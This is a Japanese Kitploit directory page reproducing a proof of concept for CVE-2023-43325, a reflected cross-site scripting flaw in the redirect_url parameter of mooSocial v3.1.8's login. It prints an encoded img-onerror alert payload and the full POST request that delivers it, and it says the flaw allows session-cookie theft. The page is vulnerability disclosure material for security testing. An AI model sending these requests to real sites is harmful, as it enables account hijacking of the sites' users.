Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-43325 — mooSocial v3.1.8 はユーザログイン機能にクロスサイトスクリプティングの脆弱性があります。 | Kitploit
ツール/GitHubGitHub/ahrixia/cve-2023-43325
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubahrixia/cve-2023-43325

CVE-2023-43325

mooSocial v3.1.8 はユーザログイン機能にクロスサイトスクリプティングの脆弱性があります。

リポジトリを見る
12年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

mooSocial: XSS (CVE-2023-43325)

mooSocial v3.1.8 のユーザーログイン機能における data[redirect_url] パラメータに、反射型クロスサイトスクリプティング (XSS) の脆弱性が存在します。この脆弱性により、攻撃者は細工された URL を介してユーザーのセッションクッキーを盗み、アカウントになりすますことが可能です。

脆弱なパラメータ: data[redirect_url]

エクスプロイト - 概念実証 (POC)

反射型クロスサイトスクリプティング (XSS)

root@kitploit:~
Payload : test">test 
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

POST Request on /moosocial/users/login (POST REQUEST DATA ONLY):

root@kitploit:~
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

スクリーンショット

image

ツールをダウンロード